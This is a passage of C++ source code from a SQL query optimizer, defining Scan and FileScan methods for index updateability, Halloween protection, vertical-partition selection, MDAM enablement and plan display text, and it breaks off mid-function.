// returns true for an index if it is
// a) a unique/clustering index or
// b) has a unique predicate on its key or
// c) has an equals or range predicate on all the index columns that
// get updated. If one of the key columns being updated has a range predicate
// then needsHalloweenProtection is set to TRUE.
// Note that if a key column is being updated and has no predicate on it then
// we return FALSE.

// preds has predicate in non-RangeSpec form,
// while pred will be in RangeSpec form if feature is enabled.
ValueIdSet pred = getSelectionPredicates(), dummySet;

SearchKey searchKey(idx->getIndexKey(),
                    idx->getOrderOfKeyValues(),
                    getGroupAttr()->getCharacteristicInputs(),
                    TRUE,
                    pred,
                    dummySet, // needed by the interface but not used here
                    idx
                    );

// Unique index is OK to use.
if (searchKey.isUnique())
  return TRUE;

const ValueIdList colUpdated = getTableDesc()->getColUpdated();
const ValueIdList indexKey = idx->getIndexKey();

// Determine if the columns being updated are key columns. Each key
// column being updated must have an associated equality clause in
// the WHERE clause of the UPDATE for it to be used.
for (CollIndex i = 0; i < colUpdated.entries(); i++)
{
  ItemExpr *updateCol = colUpdated[i].getItemExpr();
  CMPASSERT(updateCol->getOperatorType() == ITM_BASECOLUMN);
  for (CollIndex j = 0; j < indexKey.entries(); j++)
  {
    ItemExpr *keyCol = indexKey[j].getItemExpr();
    ItemExpr *baseCol = ((IndexColumn*)keyCol)->getDefinition().getItemExpr();
    CMPASSERT(baseCol->getOperatorType() == ITM_BASECOLUMN);
    if (getGroupAttr()->isEmbeddedUpdate()){
      // For embedded updates, reject any index whose key contains an
      // updated column.
      if (((BaseColumn*)updateCol)->getColNumber() ==
          ((BaseColumn*)baseCol)->getColNumber())
        return FALSE;
    }
    if ((NOT(idx->isUniqueIndex() || idx->isClusteringIndex()) &&
         (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) !=
          DF_AGGRESSIVE)) ||
        (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY) ==
         DF_OFF))
    {
      if (((BaseColumn*)updateCol)->getColNumber() ==
          ((BaseColumn*)baseCol)->getColNumber())
      {
        // equality pred pins the key column: safe to use this index;
        // range pred: usable, but only with Halloween protection;
        // no pred at all: reject the index.
        if (preds.containsAsEquiLocalPred(baseCol->getValueId()))
          continue;
        else if (preds.containsAsRangeLocalPred(baseCol->getValueId()))
          needsHalloweenProtection = TRUE;
        else
        {
          needsHalloweenProtection = FALSE;
          return FALSE;
        }
      } // index key col is being updated
    } // not a clustering or unique index
  } // loop over index key cols
} // loop over cols being updated
return TRUE;
} // Scan::updateableIndex

NABoolean Scan::requiresHalloweenForUpdateUsingIndexScan()
{
  // Returns TRUE if any index that is in the list of indexes that will be
  // added later in addIndexInfo() to drive the scan for an UPDATE requires
  // Halloween protection. This is decided by using Scan::updateableIndex().
  // If this method returns TRUE we will use a sort node to prevent the
  // "Halloween Update Problem".
// preds are in RangeSpec form
ValueIdSet preds = getSelectionPredicates();
const ValueIdList & colUpdated = getTableDesc()->getColUpdated();
const LIST(IndexDesc *) & ixlist = getTableDesc()->getIndexes();

// Quick exits: nothing updated, no predicates, only the clustering index,
// or the CQD explicitly disables Halloween protection.
if ((colUpdated.entries() == 0) ||
    (preds.entries() == 0) ||
    (ixlist.entries() == 1) || // this is the clustering index
    (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY)
       == DF_AGGRESSIVE)) // this setting means no Halloween protection
  return FALSE;

// If RangeSpec transformation is on, revert the predicates to the old
// (non-RangeSpec) tree form, since updateableIndex() expects that form.
if (CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON)
{
  ValueIdList selectionPredList(preds);
  ItemExpr *inputItemExprTree =
    selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE);
  ItemExpr * resultOld = revertBackToOldTree(STMTHEAP, inputItemExprTree);
  preds.clear();
  resultOld->convertToValueIdSet(preds, NULL, ITM_AND);
  doNotReplaceAnItemExpressionForLikePredicates(resultOld,preds, resultOld);
}

// (Re)initialized to FALSE for each index inside the loop below.
NABoolean needsHalloweenProtection ;
for (CollIndex indexNo = 0; indexNo < ixlist.entries(); indexNo++)
{
  IndexDesc *idx = ixlist[indexNo];

  // Skip the clustering index; skip unique indexes when the CQD says so.
  if (idx->isClusteringIndex() ||
      (idx->isUniqueIndex() &&
       (CmpCommon::getDefault(UPDATE_CLUSTERING_OR_UNIQUE_INDEX_KEY)
          == DF_ON)))
    continue ; // skip this idesc

  needsHalloweenProtection = FALSE;
  if(updateableIndex(idx, preds, needsHalloweenProtection) &&
     needsHalloweenProtection)
    return TRUE; // if even one index requires Halloween, then we add the sort
}
return FALSE;
}

// how many index descriptors can be used with this scan node?
CollIndex Scan::numUsableIndexes()
{
  // start with the index-only indexes
  CollIndex result = indexOnlyIndexes_.entries();

  // for each index join, count all the indexes that result in equivalent
  // characteristics inputs and outputs
  for (CollIndex i=0; i < possibleIndexJoins_.entries(); i++)
    result += possibleIndexJoins_[i]->usableIndexes_.entries();

  return result;
}

// this method works like an operator[], with values for indexNum
// between 0 and numUsableIndexes()-1. It returns the associated IndexDesc
// and - depending on whether it is an index-only scan or an index join -
// the appropriate information class (optional).
IndexDesc * Scan::getUsableIndex(CollIndex indexNum,
                                 IndexProperty **indexOnlyInfo,
                                 ScanIndexInfo **indexJoinInfo)
{
  IndexDesc *result = NULL;
  IndexProperty *locIndexOnlyInfo = NULL;
  ScanIndexInfo *locIndexJoinInfo = NULL;

  if (indexNum < indexOnlyIndexes_.entries())
  {
    // indexNum corresponds to an index-only scan
    locIndexOnlyInfo = indexOnlyIndexes_[indexNum];
    result = locIndexOnlyInfo->getIndexDesc();
  }
  else
  {
    // search for index desc "indexNum" in the index joins
    // (which is a list of sets of index descs, making this
    // method somewhat complex)
    indexNum -= indexOnlyIndexes_.entries();

    CollIndex ixJoinIx = 0;
    CollIndex numIndexJoins = possibleIndexJoins_.entries();

    if (numIndexJoins > 0)
    {
      // loop over the list of index joins, counting index descs until
      // we find the right index join
      while (ixJoinIx < numIndexJoins)
      {
        ScanIndexInfo *si = possibleIndexJoins_[ixJoinIx];

        if (indexNum >= si->usableIndexes_.entries())
        {
          // not there yet, go on to the next index join
          indexNum -= si->usableIndexes_.entries();
          ixJoinIx++;
        }
        else
        {
          // now we have reached the right index join (if
          // any), select an index
          locIndexJoinInfo = si;
          result = si->usableIndexes_[indexNum]->getIndexDesc();
          break;
        }
      }
    }
  }

  // return information or NULL for not found
  if (indexOnlyInfo)
    *indexOnlyInfo = locIndexOnlyInfo;
  if (indexJoinInfo)
    *indexJoinInfo = locIndexJoinInfo;
  return result;
}

void Scan::getRequiredVerticalPartitions
                (SET(IndexDesc *) & requiredVPs,
                 SET(ValueIdSet *) & columnsProvidedByVP) const
{
  // We get requiredVPs and columnsProvidedByVP passed to us that have
  // no entries. We have to populate them with the vertical partitions
  // required to service the query and the columns that each of those
  // VPs will provide. Each entry in columnsProvidedByVP is related to
  // the corresponding entry in requiredVPs
  CMPASSERT(requiredVPs.entries() == 0 &&
            columnsProvidedByVP.entries() == 0);

  const TableDesc * tableDesc = getTableDesc();
  const LIST(IndexDesc *) & allVPs = tableDesc->getVerticalPartitions();

#ifdef OLD
  // Get all the value ids that are required by the scan and its parents
  ValueIdSet requiredValueIds(getGroupAttr()->getCharacteristicOutputs());

  // VEGPreds can have two forms, an A IS NOT NULL form and an A=B form
  // when expanded in the generator. If an index does not provide a
  // VEG member that the base table provides, a VEGPredicate could be
  // covered by the index in its IS NOT NULL form (checking a char. input
  // whether it is not null). To avoid this bug, add all the base cols
  // that contribute to VEGPredicates as explicitly required values.
  addBaseColsFromVEGPreds(requiredValueIds);

  // selection predicates are also required, add them to requiredValueIds
  requiredValueIds += getSelectionPred();

  // Remove any VEGPreds from required Values
  ValueIdSet VEGEqPreds;
  getSelectionPred().lookForVEGPredicates(VEGEqPreds);
  requiredValueIds -= VEGEqPreds;

  // The following code gets all the leaf node value ids. It deletes the
  // characteristic input list of value ids from the leaf value ids. It
  // does this since predicates are not pushed down to the VPs and the VPs
  // only provide outputs and do not take any inputs. It reassigns the
  // remaining leaf value ids as those actually required from the VPs.
  // This code e.g. will only keep the b from a predicate such as b > 3
  // and the c from an expression c + 1 in the select list.
  ValueIdSet leafValues, emptySet;
  GroupAttributes emptyGA;
  requiredValueIds.getLeafValuesForCoverTest(leafValues, emptyGA, emptySet);
  leafValues -= getGroupAttr()->getCharacteristicInputs();
  requiredValueIds = leafValues;
#endif

  // -----------------------------------------------------------------
  // Accumulate the ValueIds of all VEGPredicates.
  // -----------------------------------------------------------------
  ValueIdSet VEGEqPreds;
  getSelectionPred().lookForVEGPredicates(VEGEqPreds);

  // -----------------------------------------------------------------
  // Compute the set of expressions that will be evaluated on the
  // parent. Add a VEGReference for every VEGPredicate in this set.
  // -----------------------------------------------------------------
  // remaining expressions on parent
  ValueIdSet requiredValueIdsMembers;
  RelExpr::computeValuesReqdForPredicates(VEGEqPreds,
                                          requiredValueIdsMembers);

  ValueIdSet requiredValueIds;
  requiredValueIds.replaceVEGExpressionsAndCopy(requiredValueIdsMembers);

  // ---------------------------------------------------------------------
  // Examine the set of values required by the parent (VPJoin node).
  // Replace each VEGPredicate with a VEGReferences for its VEG; if its
  // VEG contains other VEGReferences, add them to requiredValueIds.
  // ---------------------------------------------------------------------
  RelExpr::computeValuesReqdForPredicates(
       getGroupAttr()->getCharacteristicOutputs(),
       requiredValueIds);

  requiredValueIds += getSelectionPred();
  requiredValueIds -= VEGEqPreds; // delete all VEGPredicates

  // The following code gets all the leaf node value ids. It deletes the
  // characteristic input list of value ids from the leaf value ids. It
  // does this since predicates are not pushed down to the VPs and the VPs
  // only provide outputs and do not take any inputs. It reassigns the
  // remaining leaf value ids as those actually required from the VPs.
  // This code e.g. will only keep the b from a predicate such as b > 3
  // and the c from an expression c + 1 in the select list.
  ValueIdSet leafValues, emptySet;
  GroupAttributes emptyGA;
  requiredValueIds.getLeafValuesForCoverTest(leafValues, emptyGA, emptySet);
  leafValues -= getGroupAttr()->getCharacteristicInputs();
  requiredValueIds = leafValues;

  // Remove all basecolumns (logical columns)
  //
  for(ValueId expr = requiredValueIds.init();
      requiredValueIds.next(expr);
      requiredValueIds.advance(expr))
  {
    ItemExpr *ie = expr.getItemExpr();
    if(ie->getOperatorType() == ITM_BASECOLUMN)
      requiredValueIds -= expr;
  }

  // the values that are covered by every vertical partition (such as
  // clustering key)
  ValueIdSet alwaysCovered;

  // a list of VEGReferences to the clustering key column(s)
  ValueIdSet clusteringKeyColumns;

  // some helper variables
  ValueIdList clusteringKeyColList;
  GroupAttributes alwaysCoveredGA;
  ValueIdSet dummyReferencedInputs;
  ValueIdSet dummyUnCoveredExpr;

  // ---------------------------------------------------------------------
  // find out the subset of values that are always covered
  // ---------------------------------------------------------------------

  // get the clustering key columns and transform them into VEGies
  tableDesc->getEquivVEGCols(tableDesc->getClusteringIndex()->getIndexKey(),
                             clusteringKeyColList);
  clusteringKeyColumns = clusteringKeyColList;

  // make group attributes that get the original scan node's char.
  // inputs and the clustering key columns as outputs (every VP
  // should have the clustering key), to represent the least common
  // denominator of all VP attributes
  alwaysCoveredGA.addCharacteristicOutputs(clusteringKeyColumns);

  requiredValueIds.isCovered(getGroupAttr()->getCharacteristicInputs(),
                             alwaysCoveredGA,
                             dummyReferencedInputs,
                             alwaysCovered,
                             dummyUnCoveredExpr);

  // alwaysCovered now contains a set of values that should be covered
  // by every vertical partition
  ValueIdSet remainingValueIds = requiredValueIds;

  // ---------------------------------------------------------------------
  // For each vertical partition, check whether it provides any useful
  // values
  // ---------------------------------------------------------------------
  for (CollIndex indexNo = 0; indexNo < allVPs.entries(); indexNo++)
  {
    IndexDesc *idesc = allVPs[indexNo];
    ValueIdSet indexColumns(idesc->getIndexColumns());
    // allocated on the statement heap because it is handed back to the
    // caller via columnsProvidedByVP
    ValueIdSet *coveredSubexpr = new (CmpCommon::statementHeap()) ValueIdSet();
    ValueIdSet noCharacteristicInputs;
    GroupAttributes vpGroupAttributes;
    NABoolean onlyOneVPRequired;

    // make group attributes for a vertical partition scan
    vpGroupAttributes.addCharacteristicOutputs(idesc->getIndexColumns());

    // does the index cover all required values, and if not, which
    // ones does it cover
    onlyOneVPRequired = requiredValueIds.isCovered(noCharacteristicInputs,
                                                   vpGroupAttributes,
                                                   dummyReferencedInputs,
                                                   *coveredSubexpr,
                                                   dummyUnCoveredExpr);
    if (onlyOneVPRequired)
    {
      // This vertical partition supplies all the required values.
      // That means we have all the required vertical partitions
      // and we are done. In fact, if we had selected other VPs
      // before we need to clear them out along with the columns
      // they provide.
      // There should not be any selection predicates in this list
      // since they should have been eliminated from
      // requiredValueIds by the leaf value id code earlier.
requiredVPs.clear();
      columnsProvidedByVP.clear();
      requiredVPs.insert(idesc);
      columnsProvidedByVP.insert(coveredSubexpr);
      return;
    }
    else
    {
      if(remainingValueIds.entries() > 0)
      {
        // recompute the covered subexpressions against what is still needed
        coveredSubexpr->clear();
        requiredValueIds.isCovered(noCharacteristicInputs,
                                   vpGroupAttributes,
                                   dummyReferencedInputs,
                                   *coveredSubexpr,
                                   dummyUnCoveredExpr);
        // This vertical partition does not provide all required values.
        // Normally we wouldn't expect it to. But does it provide a
        // column value other than the clustering key? If it does, it's in!
        // We should take out the selection predicates since we will
        // not be evaluating any predicates in the VP scan.
        if ( (*coveredSubexpr != alwaysCovered) &&
             ((*coveredSubexpr).entries() > 0) )
        {
          requiredVPs.insert(idesc);
          *coveredSubexpr -= getSelectionPred();
          columnsProvidedByVP.insert(coveredSubexpr);
        } // VP delivers column values
        remainingValueIds -= *coveredSubexpr;
      }
    } // not onlyOneVPRequired
  } // for each VP
  return;
} // Scan::getRequiredVerticalPartitions

// Adds to vs every base column of this table that participates in a
// VEGPredicate of the selection predicates (see the VEGPred expansion
// note in getRequiredVerticalPartitions' #ifdef OLD section).
void Scan::addBaseColsFromVEGPreds(ValueIdSet &vs) const
{
  // get all the base columns of the table (no VEGies)
  ValueIdSet baseCols(tabId_->getColumnList());

  for (ValueId x = getSelectionPred().init();
       getSelectionPred().next(x);
       getSelectionPred().advance(x))
  {
    ItemExpr *ie = x.getItemExpr();
    if (ie->getOperatorType() == ITM_VEG_PREDICATE)
    {
      // get the VEG members
      ValueIdSet vegMembers(
           ((VEGPredicate *)ie)->getVEG()->getAllValues());

      // filter out the base columns of this table that are VEG members
      // and add them to the output parameter
      vegMembers.intersectSet(baseCols);
      vs += vegMembers;
    }
  }
}

// Scan adds no local expressions of its own; defer to the base class.
void Scan::addLocalExpr(LIST(ExprNode *) &xlist,
                        LIST(NAString) &llist) const
{
  RelExpr::addLocalExpr(xlist,llist);
}

NABoolean Scan::reconcileGroupAttr(GroupAttributes *newGroupAttr)
{
  addIndexInfo();
  const SET(IndexDesc *) & indexOnlyScans = deriveIndexOnlyIndexDesc();
  const SET(IndexDesc *) & indexJoinScans = deriveIndexJoinIndexDesc();
  // we add the available indexes on this scan node to the
  // new GroupAttrs availableBtreeIndexes
  newGroupAttr->addToAvailableBtreeIndexes(indexOnlyScans);
  newGroupAttr->addToAvailableBtreeIndexes(indexJoinScans);
  // This one is not actually necessary
  getGroupAttr()->addToAvailableBtreeIndexes(indexOnlyScans);
  getGroupAttr()->addToAvailableBtreeIndexes(indexJoinScans);
  // Now as usual
  return RelExpr::reconcileGroupAttr(newGroupAttr);
}

// --------------------------------------------------------------------
// 10-040128-2749 -begin
// This will compute based on the context,Current Control table setting
// and defaults.
// Input : Context
// --------------------------------------------------------------------
NABoolean Scan::isMdamEnabled(const Context *context)
{
  NABoolean mdamIsEnabled = TRUE;

  // -----------------------------------------------------------------------
  // Check the status of the enabled/disabled flag in
  // the defaults:
  // -----------------------------------------------------------------------
  if (CmpCommon::getDefault(MDAM_SCAN_METHOD) == DF_OFF)
    mdamIsEnabled = FALSE;

  // -----------------------------------------------------------------------
  // Mdam can also be disabled for a particular scan via Control
  // Query Shape. The information is passed by the context.
  // -----------------------------------------------------------------------
  if (mdamIsEnabled)
  {
    const ReqdPhysicalProperty* propertyPtr =
      context->getReqdPhysicalProperty();
    if ( propertyPtr
         && propertyPtr->getMustMatch()
         && (propertyPtr->getMustMatch()->getOperatorType()
             == REL_FORCE_ANY_SCAN))
    {
      ScanForceWildCard* scanForcePtr =
        (ScanForceWildCard*)propertyPtr->getMustMatch();
      if (scanForcePtr->getMdamStatus() == ScanForceWildCard::MDAM_OFF)
        mdamIsEnabled = FALSE;
    }
  }

  // -----------------------------------------------------------------------
  // Mdam can also be disabled for a particular table via a Control
  // Table command.
  // -----------------------------------------------------------------------
  if (mdamIsEnabled)
  {
    const NAString * val =
      ActiveControlDB()->getControlTableValue(
           getTableName().getUgivenName(), "MDAM");
    if ((val) && (*val == "OFF")) // CT in effect
    {
      mdamIsEnabled = FALSE;
    }
  }
  return mdamIsEnabled;
}
// 10-040128-2749 -end

// -----------------------------------------------------------------------
// methods for class ScanIndexInfo
// -----------------------------------------------------------------------

// Copy constructor.
// NOTE(review): inputsToIndex_ is NOT copied here, although the other
// constructor below initializes it — verify this omission is intentional.
ScanIndexInfo::ScanIndexInfo(const ScanIndexInfo & other) :
  outputsFromIndex_ (other.outputsFromIndex_),
  indexPredicates_ (other.indexPredicates_),
  joinPredicates_ (other.joinPredicates_),
  outputsFromRightScan_ (other.outputsFromRightScan_),
  transformationDone_ (other.transformationDone_),
  indexColumns_ (other.indexColumns_),
  usableIndexes_ (other.usableIndexes_)
{}

ScanIndexInfo::ScanIndexInfo(
     const ValueIdSet& inputsToIndex,
     const ValueIdSet& outputsFromIndex,
     const ValueIdSet& indexPredicates,
     const ValueIdSet& joinPredicates,
     const ValueIdSet& outputsFromRightScan,
     const ValueIdSet& indexColumns,
     IndexProperty* ixProp
     ) :
  inputsToIndex_(inputsToIndex),
  outputsFromIndex_(outputsFromIndex),
  indexPredicates_(indexPredicates),
  joinPredicates_(joinPredicates),
  outputsFromRightScan_(outputsFromRightScan),
  indexColumns_(indexColumns),
  transformationDone_(FALSE),
  usableIndexes_(CmpCommon::statementHeap())
{
  usableIndexes_.insert(ixProp);
}

// -----------------------------------------------------------------------
// methods for class FileScan
// -----------------------------------------------------------------------
FileScan::FileScan(const CorrName& tableName,
                   TableDesc * tableDescPtr,
                   const IndexDesc *indexDescPtr,
                   const NABoolean isReverseScan,
                   const Cardinality& baseCardinality,
                   StmtLevelAccessOptions& accessOpts,
                   GroupAttributes * groupAttributesPtr,
                   const ValueIdSet& selectionPredicates,
                   const Disjuncts& disjuncts,
                   const ValueIdSet& generatedCCPreds,
                   OperatorTypeEnum otype) :
  Scan (tableName, tableDescPtr, otype),
  indexDesc_(indexDescPtr),
  reverseScan_(isReverseScan),
  executorPredTree_(NULL),
  mdamKeyPtr_(NULL),
  disjunctsPtr_(&disjuncts),
  pathKeys_(NULL),
  partKeys_(NULL),
  hiveSearchKey_(NULL),
  estRowsAccessed_ (0),
  mdamFlag_(UNDECIDED),
  skipRowsToPreventHalloween_(FALSE),
  doUseSearchKey_(TRUE),
  computedNumOfActivePartitions_(-1)
{
  // Set the filescan properties:

  // Set the base cardinality to that for the logical scan
  setBaseCardinality(baseCardinality);

  // move the statement level access options
  accessOptions() = accessOpts;

  // the top node keeps the original group attributes
  setGroupAttr(groupAttributesPtr);

  // Initialize selection predicates:
  // (they are needed to set the executor predicates later in
  // pre-code gen)
  selectionPred().insert(selectionPredicates);

  // Get the predicates on the partitioning key:
  if (getIndexDesc() && getIndexDesc()->isPartitioned())
  {
    ValueIdSet externalInputs = getGroupAttr()->getCharacteristicInputs();
    ValueIdSet dummySet;
    ValueIdSet selPreds(selectionPredicates);

    // Create and set the Searchkey for the partitioning key:
    partKeys_ = new (CmpCommon::statementHeap())
      SearchKey(indexDesc_->getPartitioningKey(),
                indexDesc_->getOrderOfPartitioningKeyValues(),
                externalInputs,
                NOT getReverseScan(),
                selPreds,
                disjuncts,
                dummySet, // needed by interface but not used here
                indexDesc_
                );

    // For range-partitioned tables, compute how many partitions the
    // partitioning-key predicates leave active.
    if ( indexDesc_->getPartitioningFunction() &&
         indexDesc_->getPartitioningFunction()
           ->castToRangePartitioningFunction() )
    {
      const RangePartitioningFunction* rangePartFunc =
        indexDesc_->getPartitioningFunction()
          ->castToRangePartitioningFunction();

      computedNumOfActivePartitions_ =
        rangePartFunc->computeNumOfActivePartitions(partKeys_, tableDescPtr);
    }
  }

  setComputedPredicates(generatedCCPreds);
} // FileScan()

void FileScan::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  //
  // Assign the set of columns that belong to the index to be scanned
  // as the output values that can be produced by this scan.
  //
  outputValues.insertList( getIndexDesc()->getIndexColumns() );

  // MV --
  // Add the CurrentEpoch column as well.
  outputValues.insert(getExtraOutputColumns());
} // FileScan::getPotentialOutputValues()

NABoolean FileScan::patternMatch(const RelExpr & other) const
{
  // handle the special case of a pattern to force a
  // specific table or index
  if (other.getOperatorType() == REL_FORCE_ANY_SCAN)
  {
    ScanForceWildCard &w = (ScanForceWildCard &) other;

    if (w.getExposedName() != "")
    {
      QualifiedName wName(w.getExposedName(), 1 /* minimal 1 part name */);

      if (getTableName().getCorrNameAsString() != "")
      {
        // query uses a correlation name, compare that with the wildcard
        // as a string
        if (wName.getQualifiedNameAsAnsiString() !=
            ToAnsiIdentifier(getTableName().getCorrNameAsString()))
          return FALSE;
      }
      else
      {
        // no correlation name used in the query, compare catalog, schema
        // and table parts separately, if they exist in the wildcard
        const NAString& catName = wName.getCatalogName();
        const NAString& schName = wName.getSchemaName();
        const QualifiedName& x = getTableName().
          getExtendedQualNameObj().getQualifiedNameObj();

        if ((catName.length() > 0 && x.getCatalogName() != catName) ||
            (schName.length() > 0 && x.getSchemaName() != schName) ||
            x.getObjectName() != wName.getObjectName())
          return FALSE;
      }
    }

    // if an index name was specified in the wildcard, check for it
    if (w.getIndexName() != "")
    {
      NAString forcedIndexName(w.getIndexName(), CmpCommon::statementHeap());

      // The user can specify the index to be the base table in the
      // Control Query Shape statement by using the table name (object
      // name or correlation) as the index name. Ex: scan('t1','t1',..)
      // since t1 might be a correlation name, its necessary to check
      // for the corresponding object name and not the table correlation
      // name when searching for the index match.
if (forcedIndexName == w.getExposedName()) forcedIndexName = ToAnsiIdentifier( getTableName().getQualifiedNameObj().getObjectName() ); // get the three-part name of the index const NAString &ixName = indexDesc_->getNAFileSet()->getExtFileSetName(); // Declare a match if either the index name in w is equal to // indexName or if it is equal to the last part of indexName. //if (w.getIndexName() != ixName) if (forcedIndexName != ixName) { QualifiedName ixNameQ(ixName, 1); if ( ToAnsiIdentifier(ixNameQ.getObjectName()) != forcedIndexName ) return FALSE; } } return TRUE; } else return RelExpr::patternMatch(other); } NABoolean FileScan::duplicateMatch(const RelExpr & other) const { if (!Scan::duplicateMatch(other)) return FALSE; FileScan &o = (FileScan &) other; if (//beginKeyPred_ != o.beginKeyPred_ OR //endKeyPred_ != o.endKeyPred_ OR retrievedCols_ != o.retrievedCols_ OR getExecutorPredicates() != o.getExecutorPredicates()) return FALSE; return TRUE; } RelExpr * FileScan::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { // $$$ Function needs to be updated with new fields // added to the filescan. // If you need to use this function please update it // with those new fields (i.e. 
SearchKey *, etc's) // then remove the following abort // CMPABORT; FileScan *result; if (derivedNode == NULL) result = new(outHeap) FileScan(getTableName(), getTableDesc(), getIndexDesc(), REL_FILE_SCAN, outHeap); else result = (FileScan *) derivedNode; result->setBaseCardinality(getBaseCardinality()); result->setEstRowsAccessed(getEstRowsAccessed()); result->beginKeyPred_ = beginKeyPred_; result->endKeyPred_ = endKeyPred_; result->setExecutorPredicates(getExecutorPredicates()); result->retrievedCols_ = retrievedCols_; return Scan::copyTopNode(result, outHeap); } NABoolean FileScan::isLogical() const { return FALSE; } NABoolean FileScan::isPhysical() const { return TRUE; } PlanPriority FileScan::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; // --------------------------------------------------------------------- // If under interactive_access mode, then give preference to plans that // avoid full table scans // Similarly if under firstN optimization mode then give preference to // plans that avoid full table scans // --------------------------------------------------------------------- NABoolean interactiveAccess = (CmpCommon::getDefault(INTERACTIVE_ACCESS) == DF_ON) OR ( QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()); int indexPriorityDelta = getIndexDesc()->indexHintPriorityDelta(); if (interactiveAccess) { if(getMdamKeyPtr()) { // We have MDAM. Give this a preference result.incrementLevels(INTERACTIVE_ACCESS_MDAM_PRIORITY,0); } else if(getSearchKeyPtr() AND getSearchKeyPtr()->getKeyPredicates().entries()) { // We have direct index access. 
Give this a preference result.incrementLevels(INTERACTIVE_ACCESS_PRIORITY,0); } } if (indexPriorityDelta && !areHintsSuppressed()) // yes, the index is one of the indexes listed in the hint result.incrementLevels(indexPriorityDelta, 0); return result; } // currently only used by MV query rewrite PlanPriority PhysicalMapValueIds::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; // is this MVI wraps one of the favorite MVs // (included in the MVQR_REWRITE_CANDIDATES default) if (includesFavoriteMV()) { result.incrementLevels(MVQR_FAVORITE_PRIORITY,0); } return result; } const NAString FileScan::getText() const { // --------------------------------------------------------------------- // returns: // // file scan t c for a primary index scan on table // t with correlation name c // index scan ix(t c) for an index scan on index ix of // table t // rev. index scan ix(t c) if the scan goes backwards // --------------------------------------------------------------------- NAString op(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); if (isSampleScan() == TRUE) op = "sample_"; if (indexDesc_ == NULL OR indexDesc_->isClusteringIndex()) { if (isHiveTable()) op += "hive_scan "; else op += "file_scan "; } else { op += "index_scan "; tname = indexDesc_->getIndexName().getQualifiedNameAsString() + "(" + tname + ")"; } if (reverseScan_) op += NAString("rev "); return op + tname; } const NAString FileScan::getTypeText() const { NAString descr(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); if (isSampleScan() == TRUE) descr = "sample "; if (reverseScan_) descr += NAString("reverse "); if (isFullScanPresent() && !getMdamKeyPtr()) { descr += "full scan "; if (getMdamKeyPtr()) descr += "limited by mdam "; } else { descr += "subset scan "; if (getMdamKeyPtr()) descr += "limited by mdam "; } descr += "of "; if (indexDesc_ == NULL 
OR indexDesc_->isClusteringIndex()) descr += "table "; else { descr += "index "; tname = indexDesc_->getIndexName().getQualifiedNameAsString() + "(" + tname + ")"; } descr += tname; return descr; } void FileScan::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (getIndexDesc() != NULL) { const ValueIdList& keyColumns = getIndexDesc()->getIndexKey(); xlist.insert(keyColumns.rebuildExprTree()); llist.insert("key_columns"); } if (executorPredTree_ != NULL OR NOT getExecutorPredicates().isEmpty()) { if (getExecutorPredicates().isEmpty()) xlist.insert(executorPredTree_); else xlist.insert(getExecutorPredicates().rebuildExprTree()); llist.insert("executor_predicates"); } // ----------------------------------------------------------------------- // Display key information // ----------------------------------------------------------------------- if (getMdamKeyPtr() != NULL) { // Mdam access! const CollIndex columns = getIndexDesc()->getIndexKey().entries(); const CollIndex disjEntries = getMdamKeyPtr()->getKeyDisjunctEntries(); // If we are in the optimizer, obtain key preds from // the disjuncts, // else obtain them from the column order list array: if (NOT nodeIsPreCodeGenned()) { // We are in the optimizer... // For every disjunct for (CollIndex i=0; i < disjEntries; i++) { ColumnOrderList kpbc(getIndexDesc()->getIndexKey()); getMdamKeyPtr()->getKeyPredicatesByColumn(kpbc,i); // gather the key predicates: ValueIdSet keyPreds; for (CollIndex j=0; j < columns; j++) { if (kpbc[j]) { keyPreds.insert(*(kpbc[j])); } } // display this disjunct key preds. into the GUI: xlist.insert(keyPreds.rebuildExprTree()); llist.insert("mdam_disjunct"); } // for every disjunct } else { // we are after the generator... 
const ColumnOrderListPtrArray &columnOrderListPtrArray = getMdamKeyPtr()->getColumnOrderListPtrArray(); // we are in the generator, obtain the key preds // from thr column order list: ValueIdSet *predsPtr = NULL; for (CollIndex n = 0; n < columnOrderListPtrArray.entries(); n++) { // get the list of key predicates associated with the n disjunct: const ColumnOrderList &columnOrderList = *columnOrderListPtrArray[n]; // get predicates for column order i: // gather the key predicates: ValueIdSet keyPreds; const ValueIdSet *predsPtr = NULL; for (CollIndex i = 0; i < columnOrderList.entries(); i++) { predsPtr = columnOrderList[i]; if (predsPtr) { keyPreds.insert(*predsPtr); } } // display this disjunct key preds. into the GUI: xlist.insert(keyPreds.rebuildExprTree()); llist.insert("mdam_disjunct"); } } // mdam after the generator } // mdam access else if (getSearchKeyPtr() != NULL) // Is Single subset access? { // yes! // display preds from search key only if begin/end keys are // not generated yet (e.g. 
